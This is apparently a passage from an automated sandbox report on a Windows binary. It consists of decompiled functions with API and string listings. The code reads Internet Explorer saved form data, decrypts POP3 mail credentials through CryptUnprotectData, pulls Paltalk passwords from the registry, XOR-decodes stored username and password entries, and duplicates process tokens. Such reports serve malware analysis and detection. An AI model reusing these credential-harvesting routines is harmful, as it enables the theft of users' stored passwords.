                                          				 *(_t172 + 0x1a0) = _t170;
                                          				 *((intOrPtr*)(_t172 + 0x40)) = 1;
                                          				 *((intOrPtr*)(_t172 + 0x198)) = 1;
                                          				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
                                          				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
                                          				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
                                          				return E004094DA(_t172);
                                          			}

                                          APIs
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409591
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004095AD
                                          • memcpy.MSVCRT ref: 004095D5
                                          • memcpy.MSVCRT ref: 004095F2
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040967B
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409685
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004096BD
                                            • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                            • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                            • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                            • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                          • String ID: $$d
                                          • API String ID: 2915808112-2066904009
                                          • Opcode ID: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
                                          • Instruction ID: c86123869de2e32e5bed1250838fccac9115591d6117e5efa9fb73667f4d6fb1
                                          • Opcode Fuzzy Hash: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
                                          • Instruction Fuzzy Hash: D8514971A01704AFDB24DF29D582BAAB7F4FF48314F10852EE55ADB292DB74E9408F44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetParent.USER32(00000000), ref: 004134D2
                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
                                          • GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
                                          • GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
                                          • GetWindowRect.USER32(00000000,?), ref: 0041351F
                                          • CopyRect.USER32(?,?), ref: 00413533
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
                                          • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
                                          • String ID:
                                          • API String ID: 2317770421-0
                                          • Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                          • Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
                                          • Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                          • Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                          • API String ID: 3510742995-3273207271
                                          • Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                          • Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
                                          • Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                          • Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 004102AA
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,73AFF420,00000000), ref: 004102C3
                                          • _strnicmp.MSVCRT ref: 004102DF
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,73AFF420,00000000), ref: 0041030D
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,73AFF420,00000000), ref: 0041032C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide$_strnicmpmemset
                                          • String ID: WindowsLive:name=*$windowslive:name=
                                          • API String ID: 2393399448-3589380929
                                          • Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                          • Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
                                          • Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                          • Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E0040821A(void* __eflags, intOrPtr _a4) {
                                          				int _v8;
                                          				int _v12;
                                          				int _v16;
                                          				void* _v20;
                                          				intOrPtr _v24;
                                          				int _v28;
                                          				intOrPtr _v32;
                                          				void _v287;
                                          				char _v288;
                                          				void* __esi;
                                          				void** _t43;
                                          				intOrPtr _t80;
                                          				void* _t84;
                                          				void* _t85;
                                          				void* _t86;
                                          
                                          				_t80 = _a4;
                                          				_v32 = _t80 + 0x24;
                                          				E0040733E(_t80 + 0x24);
                                          				_t43 =  &_v20;
                                          				0x411d68(0x80000001, "Software\Microsoft\Internet Explorer\IntelliForms\Storage2", _t43);
                                          				_t85 = _t84 + 0xc;
                                          				if(_t43 == 0) {
                                          					_v16 = 0;
                                          					_v24 = _t80 + 0x64;
                                          					E0040746B(_t80 + 0x64, 0x2000);
                                          					_v28 = 0;
                                          					_v12 = 0xff;
                                          					_v8 = 0x2000;
                                          					_v288 = 0;
                                          					memset( &_v287, 0, 0xff);
                                          					_t86 = _t85 + 0xc;
                                          					if(RegEnumValueA(_v20, 0,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) != 0) {
                                          						L4:
                                          						return RegCloseKey(_v20);
                                          					}
                                          					_a4 = _a4 + 0x44;
                                          					do {
                                          						0x413df2( &_v288);
                                          						E00407364(_v32,  &_v288, 0xffffffff);
                                          						E00407364(_a4, E004074AA(_v24), _v8);
                                          						_v16 = _v16 + 1;
                                          						_v28 = 0;
                                          						_v12 = 0xff;
                                          						_v8 = 0x2000;
                                          						_v288 = 0;
                                          						memset( &_v287, 0, 0xff);
                                          						_t86 = _t86 + 0xc;
                                          					} while (RegEnumValueA(_v20, _v16,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) == 0);
                                          					goto L4;
                                          				}
                                          				return _t43;
                                          			}

                                          APIs
                                            • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                            • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                            • Part of subcall function 0040746B: ??3@YAXPAX@Z.MSVCRT ref: 00407478
                                          • memset.MSVCRT ref: 00408286
                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 004082AF
                                          • _strupr.MSVCRT ref: 004082CD
                                            • Part of subcall function 00407364: strlen.MSVCRT ref: 00407375
                                            • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                            • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                            • Part of subcall function 00407364: memcpy.MSVCRT ref: 004073DB
                                          • memset.MSVCRT ref: 00408313
                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 0040833E
                                          • RegCloseKey.ADVAPI32(?), ref: 0040834F
                                          Strings
                                          • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00408237
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$EnumValuememset$CloseOpen_struprmemcpystrlen
                                          • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                          • API String ID: 373939914-680441574
                                          • Opcode ID: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                          • Instruction ID: e14454ebfdff30ad66f99699cc9b695ae8a68f87cdcb03d8fe41683d15f76d0b
                                          • Opcode Fuzzy Hash: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                          • Instruction Fuzzy Hash: 5141EDB2D0011DAFDB11DF99DC829DEBBBCAF14304F10406ABA05F2151E634AB45CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E00407A93(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
                                          				int _v12;
                                          				int _v16;
                                          				unsigned int _v20;
                                          				int _v24;
                                          				int _v28;
                                          				char _v32;
                                          				char* _v36;
                                          				char _v40;
                                          				char _v296;
                                          				char _v552;
                                          				char _v808;
                                          				char _v1064;
                                          				void _v2087;
                                          				char _v2088;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				long _t42;
                                          				char* _t66;
                                          				void* _t70;
                                          
                                          				_v2088 = 0;
                                          				memset( &_v2087, 0, 0x3ff);
                                          				_v12 = 0x400;
                                          				_v1064 = 0;
                                          				_v808 = 0;
                                          				_v552 = 0;
                                          				_v296 = 0;
                                          				_t42 = RegQueryValueExA(_a8, "POP3_credentials", 0,  &_v16,  &_v2088,  &_v12);
                                          				_t74 = _t42;
                                          				if(_t42 != 0) {
                                          					return _t42;
                                          				}
                                          				_v32 = 0;
                                          				_v24 = 0;
                                          				_v28 = 0;
                                          				if(E00404C9D( &_v32, _t74) != 0) {
                                          					_v36 =  &_v2088;
                                          					_v40 = _v12;
                                          					if(E00404CF5( &_v32,  &_v40, 0,  &_v20) != 0) {
                                          						 *((char*)(_t70 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v552, 0xfd, 0, 0) - 0x224)) = 0;
                                          						LocalFree(_v16);
                                          						0x411d82(_a8, "POP3_name");
                                          						0x411d82(_a8, "POP3_host");
                                          						_t66 =  &_v1064;
                                          						E00406958(0xff, _t66, _a12);
                                          						 *((intOrPtr*)( *_a4))(_t66);
                                          					}
                                          				}
                                          				return E00404CE0( &_v32);
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 00407AB4
                                          • RegQueryValueExA.ADVAPI32(?,POP3_credentials,00000000,?,?,?), ref: 00407AF3
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FD,00000000,00000000,?,00000000,?), ref: 00407B57
                                          • LocalFree.KERNEL32(?), ref: 00407B67
                                            • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrlen
                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                          • API String ID: 2752996003-2190619648
                                          • Opcode ID: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
                                          • Instruction ID: 3c80738b82331245788ee24e24f692cafec0a237d8f87c7d6b462bdafe46d179
                                          • Opcode Fuzzy Hash: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
                                          • Instruction Fuzzy Hash: 9F312DB190121DAFDB11DF99DD81AEEBBBCEF48304F4040AAE955B3251D634AF448BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00410F48
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • memset.MSVCRT ref: 00410F92
                                          • RegCloseKey.ADVAPI32(?), ref: 00410FF6
                                          • RegCloseKey.ADVAPI32(?), ref: 0041101F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Closememset$EnumOpen
                                          • String ID: Software\Paltalk$nickname$pwd
                                          • API String ID: 1938129365-1014362899
                                          • Opcode ID: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
                                          • Instruction ID: 96d414647358d9b2c810da9b3bce946d65dcecd18022e5434843d59e9988e6f9
                                          • Opcode Fuzzy Hash: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
                                          • Instruction Fuzzy Hash: 7B3164B1D4011DAFDF11AB95DD42BEE7B7DAF18304F0000A6F604A2111D7399F95CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E004044DE(char _a4) {
                                          				signed int _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				int _t17;
                                          				_Unknown_base(*)()* _t19;
                                          				void* _t20;
                                          				_Unknown_base(*)()* _t22;
                                          				void* _t24;
                                          				void* _t25;
                                          				void* _t27;
                                          				void* _t33;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t17 =  &_v8;
                                          				0x410daa(0xffffffff, 0xe,  &_v16);
                                          				if(_t17 == 0) {
                                          					L10:
                                          					if(_v8 == 0) {
                                          						return _t17;
                                          					}
                                          					return FreeLibrary(_v8);
                                          				}
                                          				_t25 = _v16;
                                          				0x410d8a(_t33, _t24);
                                          				if(_t17 == 0) {
                                          					L9:
                                          					_t17 = CloseHandle(_v16);
                                          					goto L10;
                                          				}
                                          				_t19 = GetProcAddress(_v8, "DuplicateToken");
                                          				if(_t19 != 0) {
                                          					_t20 =  *_t19(_t25, 2,  &_v12);
                                          					if(_t20 != 0) {
                                          						_t27 = _v12;
                                          						0x410d8a();
                                          						if(_t20 != 0) {
                                          							_t22 = GetProcAddress(_v8, "SetThreadToken");
                                          							if(_t22 != 0) {
                                          								 *_t22( &_a4, _t27);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				goto L9;
                                          			}

                                          APIs
                                            • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                          • FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                            • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll,00410DB5,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410D94
                                          • GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                          • GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                          • CloseHandle.KERNEL32(?), ref: 00404553
                                          • CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$CloseHandleLibrary$FreeLoad
                                          • String ID: DuplicateToken$SetThreadToken
                                          • API String ID: 3357505703-785560009
                                          • Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                          • Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
                                          • Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                          • Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00408FBC(void* __eflags, intOrPtr _a4) {
                                          				void* _t3;
                                          				int _t4;
                                          				void* _t10;
                                          				void* _t13;
                                          
                                          				_t3 = E004069D3(_a4);
                                          				if(_t3 != 0) {
                                          					0x413d0c(0x41e200, _a4, _t10, _t13);
                                          					0x413d0c(0x41e308, "general");
                                          					_t4 = GetPrivateProfileIntA(0x41e308, "rtl", 0, 0x41e200);
                                          					asm("sbb eax, eax");
                                          					 *0x41e34c =  ~(_t4 - 1) + 1;
                                          					 *0x41e350 = 0;
                                          					return GetPrivateProfileStringA(0x41e308, "charset", 0x417c88, 0x41e350, 0x3f, 0x41e200);
                                          				}
                                          				return _t3;
                                          			}

                                          APIs
                                            • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                          • _mbscpy.MSVCRT ref: 00408FD6
                                          • _mbscpy.MSVCRT ref: 00408FE6
                                          • GetPrivateProfileIntA.KERNEL32(0041E308,rtl,00000000,0041E200), ref: 00408FF7
                                          • GetPrivateProfileStringA.KERNEL32(0041E308,charset,00417C88,0041E350,0000003F,0041E200), ref: 00409022
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                          • String ID: charset$general$rtl
                                          • API String ID: 888011440-3784062100
                                          • Opcode ID: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                          • Instruction ID: ef4fb33988e1ec7767552a7ed3f3ae2affcfc9826048e3bb16e6b0e4c8ee98e3
                                          • Opcode Fuzzy Hash: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                          • Instruction Fuzzy Hash: 2CF0B43568020879E3111712AC0AFFB6E68EB86F11F18843FBC14921D1D67D494185AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00405865(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
                                          				intOrPtr* _v8;
                                          				char* _v12;
                                          				intOrPtr* _v16;
                                          				int _v20;
                                          				char _v22;
                                          				char _v23;
                                          				signed int _v24;
                                          				int _v28;
                                          				int _v32;
                                          				char _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				void _v172;
                                          				char _v300;
                                          				char _v1319;
                                          				char _v1320;
                                          				char _v1321;
                                          				char _v1322;
                                          				void _v1323;
                                          				char _v1324;
                                          				void _v1547;
                                          				void _v1580;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* _t90;
                                          				void* _t98;
                                          				int _t106;
                                          				signed int _t112;
                                          				signed int _t118;
                                          				void* _t119;
                                          				intOrPtr* _t128;
                                          				void* _t129;
                                          				void* _t130;
                                          				void* _t132;
                                          				signed int _t136;
                                          				int _t147;
                                          				signed int* _t152;
                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t155;
                                          
                                          				_t130 = __ecx;
                                          				_v36 = 0;
                                          				_v1324 = 0;
                                          				memset( &_v1323, 0, 0x3ff);
                                          				_v44 = 0xffff;
                                          				_v40 = 0xffff;
                                          				_v300 = 0;
                                          				_v172 = 0;
                                          				_v20 = 0;
                                          				_v32 = 0;
                                          				_v28 = 0;
                                          				_t90 = E00407193(_a8, _t130,  &_v1324, 0x3ff,  &_v36);
                                          				_t155 = _t154 + 0x18;
                                          				while(_t90 != 0) {
                                          					if(_v20 == _v44 + 2) {
                                          						_push( &_v1323);
                                          						_t129 = 0x7f;
                                          						_v32 = 1;
                                          						E00406958(_t129,  &_v300);
                                          					}
                                          					if(_v20 == _v40 + 2) {
                                          						_v28 = 1;
                                          						_t106 = strlen( &_v1324);
                                          						if(_v1323 == 0x27) {
                                          							_t24 = _t106 - 3; // -3
                                          							if(_t24 <= 0x7c &&  *((char*)(_t153 + _t106 - 0x529)) == 0x27) {
                                          								_t136 = 8;
                                          								memcpy( &_v1580, 0x418128, _t136 << 2);
                                          								asm("movsb");
                                          								_t147 = 0;
                                          								memset( &_v1547, 0, 0xdf);
                                          								memset( &_v172, 0, 0x80);
                                          								_t112 = _v1322;
                                          								_t155 = _t155 + 0x24;
                                          								if(_t112 != 0x27) {
                                          									_v16 =  &_v1322;
                                          									_v8 =  &_v1319;
                                          									_t128 =  &_v1320;
                                          									_v12 =  &_v1321;
                                          									while(_t112 != 0) {
                                          										if(_t112 != 0x5c) {
                                          											_v12 = _v12 + 1;
                                          											_v8 = _v8 + 1;
                                          											_t152 = _t153 + _t147 - 0xa8;
                                          											_t128 = _t128 + 1;
                                          											_v16 = _v16 + 1;
                                          											 *_t152 = _t112;
                                          										} else {
                                          											_t118 =  *_t128;
                                          											if( *_v12 != 0x78) {
                                          												if(_t118 == 0x66) {
                                          													_t118 = _t118 + 0xa6;
                                          												}
                                          												if(_t118 == 0x72) {
                                          													_t118 = _t118 + 0x9b;
                                          												}
                                          												if(_t118 == 0x30) {
                                          													_t118 = 0;
                                          												}
                                          												if(_t118 == 0x6e) {
                                          													_t118 = _t118 + 0x9c;
                                          												}
                                          												if(_t118 == 0x74) {
                                          													_t118 = _t118 + 0x95;
                                          												}
                                          												if(_t118 == 0x76) {
                                          													_t118 = _t118 + 0x95;
                                          												}
                                          												if(_t118 == 0x61) {
                                          													_t118 = _t118 + 0xa6;
                                          												}
                                          												if(_t118 == 0x62) {
                                          													_t118 = _t118 + 0xa6;
                                          												}
                                          												_t152 = _t153 + _t147 - 0xa8;
                                          												_push(2);
                                          											} else {
                                          												_v24 = _t118;
                                          												_v23 =  *_v8;
                                          												_v22 = 0;
                                          												_t152 = _t153 + _t147 - 0xa8;
                                          												_t118 = E00406D5A( &_v24);
                                          												_push(4);
                                          											}
                                          											 *_t152 = _t118;
                                          											_pop(_t119);
                                          											_v12 = _v12 + _t119;
                                          											_v8 = _v8 + _t119;
                                          											_t128 = _t128 + _t119;
                                          											_v16 = _v16 + _t119;
                                          										}
                                          										 *_t152 =  *(_t153 + _t147 - 0x628) ^  *_t152 ^ 0x00000031;
                                          										_t112 =  *_v16;
                                          										_t147 = _t147 + 1;
                                          										if(_t112 != 0x27) {
                                          											continue;
                                          										}
                                          										goto L33;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					L33:
                                          					if(_v32 != 0 && _v28 != 0) {
                                          						 *((intOrPtr*)( *_a4))( &_v300);
                                          						_v32 = 0;
                                          						_v28 = 0;
                                          						_v172 = 0;
                                          						_v300 = 0;
                                          					}
                                          					if(E004070E4( &_v1324, ?str?) >= 0) {
                                          						_v44 = _v20;
                                          					}
                                          					_t98 = E004070E4( &_v1324, "S'password'");
                                          					_pop(_t132);
                                          					if(_t98 >= 0) {
                                          						_v40 = _v20;
                                          					}
                                          					_v20 = _v20 + 1;
                                          					_t90 = E00407193(_a8, _t132,  &_v1324, 0x3ff,  &_v36);
                                          					_t155 = _t155 + 0xc;
                                          				}
                                          				return _t90;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$strlen
                                          • String ID: '$'$S'password'$S'username'
                                          • API String ID: 3337090206-859024053
                                          • Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                          • Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
                                          • Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                          • Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040AC28(void* __eax) {
                                          				void* _v36;
                                          				long _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v52;
                                          				void* _v68;
                                          				long _t21;
                                          				void* _t24;
                                          				long _t26;
                                          				long _t34;
                                          				long _t37;
                                          				intOrPtr* _t40;
                                          				void* _t42;
                                          				intOrPtr* _t44;
                                          				intOrPtr* _t45;
                                          				void* _t47;
                                          
                                          				_t40 =  *0x415030; // 0x73451ab0
                                          				_t47 = __eax;
                                          				_t44 =  *0x415040; // 0x73452040
                                          				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
                                          					_t37 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                          					 *(__eax + 0x18c) = _t37;
                                          					 *_t44(_t37, 1);
                                          					SendMessageA( *(__eax + 0x184), 0x1003, 1,  *(__eax + 0x18c));
                                          				}
                                          				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                          					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                          					 *(_t47 + 0x190) = _t34;
                                          					 *_t44(_t34, 1);
                                          					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                          				}
                                          				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                          				 *(_t47 + 0x188) = _t21;
                                          				 *_t44(_t21, 2);
                                          				_v36 = LoadImageA( *0x41dbd4, 0x85, 0, 0x10, 0x10, 0x1000);
                                          				_t24 = LoadImageA( *0x41dbd4, 0x86, 0, 0x10, 0x10, 0x1000);
                                          				_t42 = _t24;
                                          				 *_t44( *(_t47 + 0x188), 0);
                                          				_t26 = GetSysColor(0xf);
                                          				_t45 =  *0x41503c; // 0x734523b0
                                          				_v40 = _t26;
                                          				 *_t45( *(_t47 + 0x188), _v44, _t26);
                                          				 *_t45( *(_t47 + 0x188), _t42, _v52);
                                          				DeleteObject(_v68);
                                          				DeleteObject(_t42);
                                          				return SendMessageA(E00405068( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                          			}



















                                          APIs
                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
                                          • GetSysColor.USER32(0000000F), ref: 0040AD0B
                                          • DeleteObject.GDI32(?), ref: 0040AD3F
                                          • DeleteObject.GDI32(00000000), ref: 0040AD42
                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                          • String ID:
                                          • API String ID: 3642520215-0
                                          • Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                          • Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
                                          • Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                          • Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: account$name$password$protocol
                                          • API String ID: 1439213657-933060687
                                          • Opcode ID: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
